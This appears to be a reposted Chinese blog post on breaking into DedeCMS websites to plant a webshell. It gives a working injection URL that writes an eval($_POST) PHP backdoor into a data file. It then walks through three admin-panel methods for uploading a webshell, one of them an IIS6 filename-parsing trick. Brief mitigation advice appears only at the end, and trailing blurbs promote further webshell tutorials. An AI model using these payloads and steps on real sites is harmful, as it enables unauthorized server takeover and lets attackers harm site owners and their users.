`
gstarwd
  • 浏览: 1538646 次
  • 性别: Icon_minigender_1
  • 来自: 杭州
社区版块
存档分类
最新评论

dedecms网站入侵拿webshell方法总结

    博客分类:
  • CMS
阅读更多
dedecms网站入侵拿webshell方法 dedecms现已广泛流传,对其安全问题不易忽视!了解入侵方法做好网站安全措施。...

dedecms网站入侵拿webshell方法

文章作者:udb311

转载请注明:http://www.hackline.net/

1、注入漏洞

存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>



 



 








 

http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

注入成功,产生了注入文件。

http://localhost:802/data/mysql_error_trace.php

一句话木马连接上传大马即可!

注入漏洞详解见
http://www.hackline.net/a/news/ldfb/2009/0830/323.html

 

2、后台拿webshell

第一种方法,利用文件管理直接创建php大马```



 

后台--核心--附件管理--文件式管理器 新建文件,写入大马文件直接访问。



 

如果没有安装文件管理器,可以查看下插件目录有没有此插件文件。

后台--模块--模块管理--文件管理器 点击安装,然后在创建php大马```



 

如果没有安装插件,并删除了插件目录就无法使用此方法。


第二种方法:利用标签源码管理

后台--模板--标签源码管理,随便选择一个标签 点编辑。文件名称输入:格式为。xxx.lib.php,内容输入大马文件即可。



 



 

第三种方法、利用模板修改。

此方法利用IIS解析漏洞,前提网站必须在IIS6.0运行。



 

后台--模板--默认模板管理,随便选择一个模板 点编辑。文件名输入dama.php;1.htm,内容输入大马文件即可。
注意,此情况输入密码可能导致跳转显示无法找到网页,你可以输入密码后,再访问dama.php;1.htm这样就可以了。因为解析时截断了文件名变成dama.php了。



 

 


目前本人对此想出以下解决办法

注入漏洞官方已有补丁,6月6号的程序更新至最新补丁即可。

标签源码在线修改,可以修改后台源文件。删除标签在线管理功能,或者改templets_tagsource.php文件名。

模板在线修改,可以通过IIS限制脚本执行。删除或者重命名templets_main.php文件```

  • 大小: 133.5 KB
  • 大小: 120.6 KB
  • 大小: 216.9 KB
  • 大小: 211.1 KB
  • 大小: 371 KB
  • 大小: 128 KB
  • 大小: 300 KB
  • 大小: 125.4 KB
  • 大小: 305.1 KB
分享到:
评论

相关推荐

    良精南方网站系统拿webshell的教程

    总结来说,良精南方网站系统拿webshell的教程涉及了网络安全中的基本攻击手段和防御策略。了解这些知识,无论是为了进行安全防护还是进行合法的渗透测试,都是必不可少的。通过深入学习和实践,我们可以更好地理解...

    网站后台拿Webshell

    通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站的webshell webshell的作用是方便攻击者,webshell是拥有...拿webshell也是getshell的另一种叫法。

    拿webshell的方法

    目前比较流行的拿webshell的方法,适合刚入行的菜鸟学习

    NC拿webshell技巧.

    NC拿webshell技巧.

    最全的WEBSHELL提权方法总结

    最全的WEBSHELL提权方法总结,非常的经典。网站入侵和网络安全必看

    NC上传拿WEBSHELL教程

    NC(Netcat)是一种功能强大的网络工具,常被安全研究人员用于搭建网络连接,进行数据传输,而WEBSHELL则是一种在网络服务器上留下的后门程序,允许攻击者远程控制被入侵的网站。 【描述】"学习有关网络攻击技术"这...

    利用抓包拿WEBSHELL

    在网络安全领域,"利用抓包拿WEBSHELL"是一个高级技术话题,涉及到网络通信的监控、数据包分析以及Web安全漏洞的利用。本教程旨在帮助你理解这一过程,但请注意,此类活动仅限于合法的学术研究和安全测试,不能用于...

    教你拿webshell

    通过"五、实战检测网站拿Webshell-新手教程"这个压缩包文件,新手可以系统地学习到Webshell的攻防技巧,了解其原理、利用方法以及防范策略。这不仅有助于提升网络安全意识,也为成为合格的网络安全专家打下坚实的...

    抓包拿webshell教材

    "抓包拿webshell教材"是一个针对网络安全技术的培训资源,它涵盖了如何利用网络数据包分析工具来发现并利用网站安全漏洞,最终获取Webshell的技巧和方法。下面我们将深入探讨这一主题。 首先,我们来理解“抓包”是...

    利用phpMyAdmin拿webshell

    利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell

    修改数据包拿WebShell

    修改数据包拿 WebShell

    数据库备份批量拿站的WEBSHELL

    数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL

    WEBSHELL提权方法总结

    ### WEBSHELL提权方法总结 #### 一、概述 在网络安全领域,WebShell作为攻击者获取服务器控制权的一种手段,被广泛应用于渗透测试及恶意攻击活动中。提权(Privilege Escalation)是指利用已有的权限进一步获取系统...

    IIS写权限拿WEBSHELL全套

    IIS写权限拿WEBSHELL全套

    抓包拿Webshell教程

    新思路 抓包拿Webshell教程 通过监听端口突破上传

    DB权限拿webshell_提权(语音)

    DB权限拿webshell_提权(语音)

    拿webshell的所有工具|工具包

    拿webshell的所有工具,里面有啊D,ASP大马,ASP小马,名小子,抓包工具,旁注工具,nb,IIS写权限漏洞,ACCESS查看器等等!

    怎么拿webshell

    以下是一些经典的Webshell获取方法的概述: 1. **Google Hacking**: 通过在Google搜索引擎中输入特定的关键字,如"edit.asp?"或"site:cq.cn inurl:asp",可以找到可能存在安全漏洞的网页,尤其是那些使用了易受攻击...

Global site tag (gtag.js) - Google Analytics